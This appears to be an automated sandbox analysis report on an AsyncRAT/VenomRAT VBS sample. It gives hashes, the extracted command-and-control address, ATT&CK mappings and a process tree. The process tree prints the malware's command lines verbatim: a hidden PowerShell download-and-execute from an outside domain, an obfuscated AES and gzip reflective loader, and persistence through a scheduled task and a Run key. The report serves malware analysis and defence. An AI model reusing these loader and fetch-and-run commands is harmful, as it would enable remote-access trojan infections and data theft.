asyncrat | 9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2024 02:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs
Size

79KB
MD5

c0e2ce250c4979a59970d22fd99f340f
SHA1

4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0
SHA256

9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2
SHA512

f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404
SSDEEP

1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild

Score

10^/10

asyncrat venomrat omen core i9 execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

OMEN core i9

45.88.88.7:4164

Mutex

qqkyuzisfolbtlf

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/4484-63-0x000001B3C2840000-0x000001B3C2858000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/4484-63-0x000001B3C2840000-0x000001B3C2858000-memory.dmp	family_asyncrat

Blocklisted process makes network request 19 IoCs

flow	pid	Process
34	4484	powershell.exe
35	4484	powershell.exe
38	4484	powershell.exe
39	4484	powershell.exe
40	4484	powershell.exe
41	4484	powershell.exe
42	4484	powershell.exe
43	4484	powershell.exe
48	4484	powershell.exe
50	4484	powershell.exe
51	4484	powershell.exe
52	4484	powershell.exe
53	4484	powershell.exe
54	4484	powershell.exe
55	4484	powershell.exe
56	4484	powershell.exe
57	4484	powershell.exe
58	4484	powershell.exe
59	4484	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3160	powershell.exe
3960	powershell.exe
1400	powershell.exe
4484	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3160	powershell.exe
3160	powershell.exe
3960	powershell.exe
3960	powershell.exe
1400	powershell.exe
1400	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeIncreaseQuotaPrivilege	1400	powershell.exe
Token: SeSecurityPrivilege	1400	powershell.exe
Token: SeTakeOwnershipPrivilege	1400	powershell.exe
Token: SeLoadDriverPrivilege	1400	powershell.exe
Token: SeSystemProfilePrivilege	1400	powershell.exe
Token: SeSystemtimePrivilege	1400	powershell.exe
Token: SeProfSingleProcessPrivilege	1400	powershell.exe
Token: SeIncBasePriorityPrivilege	1400	powershell.exe
Token: SeCreatePagefilePrivilege	1400	powershell.exe
Token: SeBackupPrivilege	1400	powershell.exe
Token: SeRestorePrivilege	1400	powershell.exe
Token: SeShutdownPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeSystemEnvironmentPrivilege	1400	powershell.exe
Token: SeRemoteShutdownPrivilege	1400	powershell.exe
Token: SeUndockPrivilege	1400	powershell.exe
Token: SeManageVolumePrivilege	1400	powershell.exe
Token: 33	1400	powershell.exe
Token: 34	1400	powershell.exe
Token: 35	1400	powershell.exe
Token: 36	1400	powershell.exe
Token: SeIncreaseQuotaPrivilege	1400	powershell.exe
Token: SeSecurityPrivilege	1400	powershell.exe
Token: SeTakeOwnershipPrivilege	1400	powershell.exe
Token: SeLoadDriverPrivilege	1400	powershell.exe
Token: SeSystemProfilePrivilege	1400	powershell.exe
Token: SeSystemtimePrivilege	1400	powershell.exe
Token: SeProfSingleProcessPrivilege	1400	powershell.exe
Token: SeIncBasePriorityPrivilege	1400	powershell.exe
Token: SeCreatePagefilePrivilege	1400	powershell.exe
Token: SeBackupPrivilege	1400	powershell.exe
Token: SeRestorePrivilege	1400	powershell.exe
Token: SeShutdownPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeSystemEnvironmentPrivilege	1400	powershell.exe
Token: SeRemoteShutdownPrivilege	1400	powershell.exe
Token: SeUndockPrivilege	1400	powershell.exe
Token: SeManageVolumePrivilege	1400	powershell.exe
Token: 33	1400	powershell.exe
Token: 34	1400	powershell.exe
Token: 35	1400	powershell.exe
Token: 36	1400	powershell.exe
Token: SeIncreaseQuotaPrivilege	1400	powershell.exe
Token: SeSecurityPrivilege	1400	powershell.exe
Token: SeTakeOwnershipPrivilege	1400	powershell.exe
Token: SeLoadDriverPrivilege	1400	powershell.exe
Token: SeSystemProfilePrivilege	1400	powershell.exe
Token: SeSystemtimePrivilege	1400	powershell.exe
Token: SeProfSingleProcessPrivilege	1400	powershell.exe
Token: SeIncBasePriorityPrivilege	1400	powershell.exe
Token: SeCreatePagefilePrivilege	1400	powershell.exe
Token: SeBackupPrivilege	1400	powershell.exe
Token: SeRestorePrivilege	1400	powershell.exe
Token: SeShutdownPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeSystemEnvironmentPrivilege	1400	powershell.exe
Token: SeRemoteShutdownPrivilege	1400	powershell.exe
Token: SeUndockPrivilege	1400	powershell.exe
Token: SeManageVolumePrivilege	1400	powershell.exe
Token: 33	1400	powershell.exe
Token: 34	1400	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4484	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 60 wrote to memory of 3160	60	WScript.exe	83
PID 60 wrote to memory of 3160	60	WScript.exe	83
PID 60 wrote to memory of 3916	60	WScript.exe	101
PID 60 wrote to memory of 3916	60	WScript.exe	101
PID 3916 wrote to memory of 3452	3916	cmd.exe	103
PID 3916 wrote to memory of 3452	3916	cmd.exe	103
PID 3916 wrote to memory of 3960	3916	cmd.exe	104
PID 3916 wrote to memory of 3960	3916	cmd.exe	104
PID 3960 wrote to memory of 1400	3960	powershell.exe	105
PID 3960 wrote to memory of 1400	3960	powershell.exe	105
PID 3960 wrote to memory of 4608	3960	powershell.exe	108
PID 3960 wrote to memory of 4608	3960	powershell.exe	108
PID 4608 wrote to memory of 2484	4608	WScript.exe	109
PID 4608 wrote to memory of 2484	4608	WScript.exe	109
PID 2484 wrote to memory of 2164	2484	cmd.exe	111
PID 2484 wrote to memory of 2164	2484	cmd.exe	111
PID 2484 wrote to memory of 4484	2484	cmd.exe	112
PID 2484 wrote to memory of 4484	2484	cmd.exe	112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:60
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_573_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_573.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1400
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_573.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_573.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Roaming\Windows_Log_573.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b66db53846de4860ca72a3e59b38c544

SHA1
2202dc88e9cddea92df4f4e8d83930efd98c9c5a

SHA256
b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

SHA512
72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5r1lr5bw.ret.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
8078d12b395b01ad397cec896ae02a6a

SHA1
2a5b18660c4b2b40969651ca16a1ede64f3aecf5

SHA256
0c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7

SHA512
df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_573.vbs

Filesize
115B

MD5
0a3db3bd20122bd2ce7dc2074ebde2cd

SHA1
e46feed793820d382957f4c206323c91981d1d25

SHA256
8f9f187bd81b061c09912725426e08e95722613c0b47ff2f14f41f18d8497a51

SHA512
b3f9e2ace998f5e7385683b89733c591402fab184d5b030fe620b8a7e524b4595bfd3f00457fd94b0938696b8d3c18a39da91ca8fd2a4d853d4ffa3aebf774da

Download Submit
memory/3160-12-0x00007FF998060000-0x00007FF998B21000-memory.dmp

Filesize
10.8MB

Download
memory/3160-16-0x00007FF998060000-0x00007FF998B21000-memory.dmp

Filesize
10.8MB

Download
memory/3160-13-0x00007FF998060000-0x00007FF998B21000-memory.dmp

Filesize
10.8MB

Download
memory/3160-0-0x00007FF998063000-0x00007FF998065000-memory.dmp

Filesize
8KB

Download
memory/3160-11-0x00007FF998060000-0x00007FF998B21000-memory.dmp

Filesize
10.8MB

Download
memory/3160-3-0x0000013CF9A10000-0x0000013CF9A32000-memory.dmp

Filesize
136KB

Download
memory/3960-31-0x000001B649100000-0x000001B649144000-memory.dmp

Filesize
272KB

Download
memory/3960-32-0x000001B649150000-0x000001B6491C6000-memory.dmp

Filesize
472KB

Download
memory/3960-33-0x000001B646B20000-0x000001B646B28000-memory.dmp

Filesize
32KB

Download
memory/3960-34-0x000001B648D20000-0x000001B648D32000-memory.dmp

Filesize
72KB

Download
memory/4484-63-0x000001B3C2840000-0x000001B3C2858000-memory.dmp

Filesize
96KB

Download